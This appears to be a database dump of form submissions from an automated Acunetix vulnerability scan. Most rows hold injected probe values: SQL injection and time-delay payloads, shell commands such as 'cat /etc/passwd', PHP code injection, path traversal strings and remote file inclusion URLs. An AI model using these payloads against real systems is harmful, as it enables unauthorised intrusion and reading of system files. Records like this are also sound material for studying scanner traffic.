901 2017-12-08 13:46:29Z 1 1 1 4111111111111111 \ 1 1 1 1 1 1 1 1
902 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 http://testasp.vulnweb.com/t/fit.txt
903 2017-12-08 13:46:29Z 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 4111111111111111 1 1 1 1 1 1 1 1 1
904 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 -1' or '60'='0 1 1 1
905 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ${@print(md5(acunetix_wvs_security_test))} 1
906 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 -1' or '58'='58 1 1 1
907 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1
908
909 1 1
910 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
911 2017-12-08 13:46:29Z 1 1 /../..//../..//../..//../..//../..//etc/passwd.jpg 4111111111111111 1 1 1 1 1 1 1 1 1
912 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1xa7 1 1 1 1 1 1 1 1
913 2017-12-08 13:46:29Z http://testasp.vulnweb.com/t/fit.txt 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
914 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 `cat /etc/passwd` 1 1
915 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ${@print(md5(acunetix_wvs_security_test))}\ 1
916 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 acunetix_wvs_invalid_filename 1 1 1 1 1 1
917 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 -1" or "108"="108 1 1 1
918 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 |cat /etc/passwd# 1 1
919 2017-12-08 13:46:29Z 1 1 1 4111111111111111 @@K8Wrd 1 1 1 1 1 1 1 1
920 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 -1" or "108"="0 1 1 1
921 2017-12-08 13:46:29Z 1 1 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 4111111111111111 1 1 1 1 1 1 1 1 1
922 2017-12-08 13:46:29Z 1 ;print(md5(acunetix_wvs_security_test)); 1 4111111111111111 1 1 1 1 1 1 1 1 1
923 2017-12-08 13:46:29Z 1 1 1 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1 1 1 1 1 1 1 1 1
924 2017-12-08 13:46:29Z 1 1 1 4111111111111111 JyI= 1 1 1 1 1 1 1 1
925 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 bbg_recv_test.php 1 1 1 1 1 1
926 2017-12-08 13:46:29Z 1 1 /etc/passwd 4111111111111111 1 1 1 1 1 1 1 1 1
927 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 -1" or "106"="106 1 1 1
928 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 '|'ld 1 1
929 2017-12-08 13:46:29Z 1 1 1 4111111111111111 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1 1 1 1 1 1 1 1
930 2017-12-08 13:46:29Z 1 1 1 4111111111111111 '" 1 1 1 1 1 1 1 1
931 2017-12-08 13:46:29Z 1 ';print(md5(acunetix_wvs_security_test));$a=' 1 4111111111111111 1 1 1 1 1 1 1 1 1
932 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 bbg_recv_test.php 1 1 1 1 1 1
933 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 "|"ld 1 1
934 2017-12-08 13:46:30Z 1 1 ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 4111111111111111 1 1 1 1 1 1 1 1 1
935 2017-12-08 13:46:30Z 1 1 1 4111111111111111 ''"" 1 1 1 1 1 1 1 1
936 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1 and sleep(4) 1 1 1
937 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1 1 1 1
938 2017-12-08 13:46:30Z 1 ";print(md5(acunetix_wvs_security_test));$a=" 1 4111111111111111 1 1 1 1 1 1 1 1 1
939 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1 ;cat /etc/passwd; 1 1
940 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 bbg_recv_test.php/. 1 1 1 1 1 1
941 2017-12-08 13:46:30Z 1 ${@print(md5(acunetix_wvs_security_test))} 1 4111111111111111 1 1 1 1 1 1 1 1 1
942 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1 ';cat /etc/passwd;' 1 1
943 2017-12-08 13:46:30Z 1 1 ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 4111111111111111 1 1 1 1 1 1 1 1 1
944 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
945 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
946 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1 1 1 1 1 1
947 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1 or (sleep(4)+1) limit 1 -- 1 1 1
948 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1 ";cat /etc/passwd;" 1 1
949 2017-12-08 13:46:30Z 1 ${@print(md5(acunetix_wvs_security_test))}\ 1 4111111111111111 1 1 1 1 1 1 1 1 1
950 2017-12-08 13:46:30Z 1 1 ................etc/passwd 4111111111111111 1 1 1 1 1 1 1 1 1
951 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1'" 1 1 1 1
952 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1 1 1
953 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1' and sleep(4)=' 1 1 1
954 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 \ 1 1 1 1
955 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 acunetix_wvs_invalid_filename 1 1 1
956 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1 ||cat /etc/passwd 1 1
957 2017-12-08 13:46:30Z 1 1 invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 4111111111111111 1 1 1 1 1 1 1 1 1
958 2017-12-08 13:46:30Z 1 1 ;print(md5(acunetix_wvs_security_test)); 4111111111111111 1 1 1 1 1 1 1 1 1
959 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 &cat /etc/passwd& 1 1 1 1 1
960 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1xa7 1 1 1 1
961 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 bbg_recv_test.php 1 1 1
962 2017-12-08 13:46:30Z 1 1 file:///etc/passwd 4111111111111111 1 1 1 1 1 1 1 1 1
963 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1
964 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1' and (sleep(4)+1) limit 1 -- 1 1 1
965 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 @@43D1l 1 1 1 1
966 2017-12-08 13:46:30Z 1 1 ';print(md5(acunetix_wvs_security_test));$a=' 4111111111111111 1 1 1 1 1 1 1 1 1
967 2017-12-08 13:46:30Z 1 1 /\../\../\../\../\../\../\../etc/passwd 4111111111111111 1 1 1 1 1 1 1 1 1
968 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 bbg_recv_test.php 1 1 1
969 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 '&cat /etc/passwd&' 1 1 1 1 1
970 2017-12-08 13:46:30Z 1 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1 4111111111111111 1 1 1 1 1 1 1 1 1
971 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 JyI= 1 1 1 1
972 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1" and sleep(4)=" 1 1 1
973 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 "&cat /etc/passwd&" 1 1 1 1 1
974 2017-12-08 13:46:30Z 1 1 WEB-INF/web.xml 4111111111111111 1 1 1 1 1 1 1 1 1
975 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 bbg_recv_test.php/. 1 1 1
976 2017-12-08 13:46:30Z 1 1 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 4111111111111111 1 1 1 1 1 1 1 1 1
977 2017-12-08 13:46:30Z 1 1 ";print(md5(acunetix_wvs_security_test));$a=" 4111111111111111 1 1 1 1 1 1 1 1 1
978 2017-12-08 13:46:30Z 1 1 WEB-INF\web.xml 4111111111111111 1 1 1 1 1 1 1 1 1
979 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1' or (sleep(4)+1) limit 1 -- 1 1 1
980 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1
981
982 1 1 1 1 1
983 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 '" 1 1 1 1
984 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1 1 1 1 1 1 1
985 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 ../../../../../../../../../../etc/passwd 1 1 1 1 1 1 1
986 2017-12-08 13:46:30Z 1 1 ${@print(md5(acunetix_wvs_security_test))} 4111111111111111 1 1 1 1 1 1 1 1 1
987 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
988 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 `cat /etc/passwd` 1 1 1 1 1
989 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 ''"" 1 1 1 1
990 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1 1
991 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1" or (sleep(4)+1) limit 1 -- 1 1 1
992 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 |cat /etc/passwd# 1 1 1 1 1
993 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1 1 1 1 1 1
994 2017-12-08 13:46:30Z 1 1 ${@print(md5(acunetix_wvs_security_test))}\ 4111111111111111 1 1 1 1 1 1 1 1 1
995 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 acunetix_wvs_invalid_filename 1
996 2017-12-08 13:46:30Z 1 1 1 4111111111111111 1 1 1 '|'ld 1 1 1 1 1
997 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1 1 1 1 1
998 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
999 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1'=sleep(4)=' 1 1 1
1000 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 ../../../../../../../../../../etc/passwd.jpg 1 1 1 1 1 1 1
1001 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 ;print(md5(acunetix_wvs_security_test)); 1 1 1 1 1 1 1
1002 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 bbg_recv_test.php 1
1003 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n 1 1 1 1 1 1 1
1004 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1'" 1 1 1 1 1 1
1005 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1"=sleep(4)=" 1 1 1
1006 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 "|"ld 1 1 1 1 1
1007 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1008 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 \ 1 1 1 1 1 1
1009 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1 1 1 1 1 1
1010 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 ';print(md5(acunetix_wvs_security_test));$a=' 1 1 1 1 1 1 1
1011 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 ;cat /etc/passwd; 1 1 1 1 1
1012 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1;select pg_sleep(4); -- 1 1 1
1013 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 bbg_recv_test.php 1
1014 2017-12-08 13:46:31Z ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1015 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1xa7 1 1 1 1 1 1
1016 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 ";print(md5(acunetix_wvs_security_test));$a=" 1 1 1 1 1 1 1
1017 2017-12-08 13:46:31Z 1 1 1 //www.acunetix.tst 1 1 1 1 1 1 1 1 1
1018 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 bbg_recv_test.php/. 1
1019 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 /../..//../..//../..//../..//../..//etc/passwd.jpg 1 1 1 1 1 1 1
1020 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 ';cat /etc/passwd;' 1 1 1 1 1
1021 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1';select pg_sleep(4); -- 1 1 1
1022 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1023 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 1 1 1 1 1 1 1
1024 2017-12-08 13:46:31Z 1 1 1 4111111111111111 //www.acunetix.tst 1 1 1 1 1 1 1 1
1025 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 ";cat /etc/passwd;" 1 1 1 1 1
1026 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 @@2nA8z 1 1 1 1 1 1
1027 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 ${@print(md5(acunetix_wvs_security_test))} 1 1 1 1 1 1 1
1028 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1; waitfor delay '0:0:4' -- 1 1 1
1029 2017-12-08 13:46:31Z 1 acunetix_wvs_invalid_filename 1 4111111111111111 1 1 1 1 1 1 1 1 1
1030 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 JyI= 1 1 1 1 1 1
1031 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 //www.acunetix.tst 1 1 1 1
1032 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 /etc/passwd 1 1 1 1 1 1 1
1033 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 ||cat /etc/passwd 1 1 1 1 1
1034 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 ${@print(md5(acunetix_wvs_security_test))}\ 1 1 1 1 1 1 1
1035 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 '" 1 1 1 1 1 1
1036 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1'; waitfor delay '0:0:4' -- 1 1 1
1037 2017-12-08 13:46:31Z 1 bbg_recv_test.php 1 4111111111111111 1 1 1 1 1 1 1 1 1
1038 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 &cat /etc/passwd&
1039 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 ;print(md5(acunetix_wvs_security_test)); 1 1
1040 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 1 1 1 1 1 1 1
1041 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 //www.acunetix.tst 1 1 1 1 1 1
1042 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 '&cat /etc/passwd&'
1043 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 ''"" 1 1 1 1 1 1
1044 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 ';print(md5(acunetix_wvs_security_test));$a=' 1 1
1045 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 //www.acunetix.tst 1 1 1
1046 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 1 1 1 1 1 1 1
1047 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1"; waitfor delay '0:0:4' -- 1 1 1
1048 2017-12-08 13:46:31Z 1 bbg_recv_test.php 1 4111111111111111 1 1 1 1 1 1 1 1 1
1049 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 "&cat /etc/passwd&"
1050 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1051 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1052 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 //www.acunetix.tst 1
1053 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 ................etc/passwd 1 1 1 1 1 1 1
1054 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 ";print(md5(acunetix_wvs_security_test));$a=" 1 1
1055 2017-12-08 13:46:31Z 1 bbg_recv_test.php/. 1 4111111111111111 1 1 1 1 1 1 1 1 1
1056 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1'" 1 1 1
1057 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1058 2017-12-08 13:46:31Z 1 //www.acunetix.tst 1 4111111111111111 1 1 1 1 1 1 1 1 1
1059 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 1 1 1 1 1 1 1
1060 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1
1061
1062
1063 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 -1 or 78=78 1
1064 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 \ 1 1 1
1065 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1066 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 ${@print(md5(acunetix_wvs_security_test))} 1 1
1067 2017-12-08 13:46:31Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 -1 or 78=0 1
1068 2017-12-08 13:46:31Z 1 1 //www.acunetix.tst 4111111111111111 1 1 1 1 1 1 1 1 1
1069 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 file:///etc/passwd 1 1 1 1 1 1 1
1070 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 `cat /etc/passwd`
1071 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 -1 or 78-76=2 1
1072 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 ${@print(md5(acunetix_wvs_security_test))}\ 1 1
1073 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 //www.acunetix.tst 1 1 1 1 1 1 1
1074 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 /\../\../\../\../\../\../\../etc/passwd 1 1 1 1 1 1 1
1075 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1xa7 1 1 1
1076 2017-12-08 13:46:32Z 1 1 acunetix_wvs_invalid_filename 4111111111111111 1 1 1 1 1 1 1 1 1
1077 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 -1' or '55'='55 1
1078 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 ;print(md5(acunetix_wvs_security_test)); 1 1 1 1 1
1079 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 |cat /etc/passwd#
1080 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 -1' or '55'='0 1
1081 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 WEB-INF/web.xml 1 1 1 1 1 1 1
1082 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 //www.acunetix.tst 1 1
1083 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 @@CNkWQ 1 1 1
1084 2017-12-08 13:46:32Z 1 1 bbg_recv_test.php 4111111111111111 1 1 1 1 1 1 1 1 1
1085 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 WEB-INF\web.xml 1 1 1 1 1 1 1
1086 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 -1' or '53'='53 1
1087 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 ';print(md5(acunetix_wvs_security_test));$a=' 1 1 1 1 1
1088 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 '|'ld
1089 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 //www.acunetix.tst 1 1 1 1 1
1090 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 JyI= 1 1 1
1091 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 ../../../../../../../../../../etc/passwd 1 1
1092 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 -1" or "89"="89 1
1093 2017-12-08 13:46:32Z 1 1 bbg_recv_test.php 4111111111111111 1 1 1 1 1 1 1 1 1
1094 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1
1095 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 ";print(md5(acunetix_wvs_security_test));$a=" 1 1 1 1 1
1096 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 "|"ld
1097 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 //www.acunetix.tst
1098 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 '" 1 1 1
1099 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 -1" or "89"="0 1
1100 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 ../../../../../../../../../../etc/passwd.jpg 1 1
1101 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 ''"" 1 1 1
1102 2017-12-08 13:46:32Z //www.acunetix.tst 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1103 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 ;cat /etc/passwd;
1104 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 ${@print(md5(acunetix_wvs_security_test))} 1 1 1 1 1
1105 2017-12-08 13:46:32Z 1 1 bbg_recv_test.php/. 4111111111111111 1 1 1 1 1 1 1 1 1
1106 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 -1" or "87"="87 1
1107 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1108 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n 1 1
1109 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 ';cat /etc/passwd;'
1110 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1111 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 ${@print(md5(acunetix_wvs_security_test))}\ 1 1 1 1 1
1112 2017-12-08 13:46:32Z 1 1 1
1113
1114
1115
1116
1117 1 1 1 1 1 1 1 1 1
1118 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 ";cat /etc/passwd;"
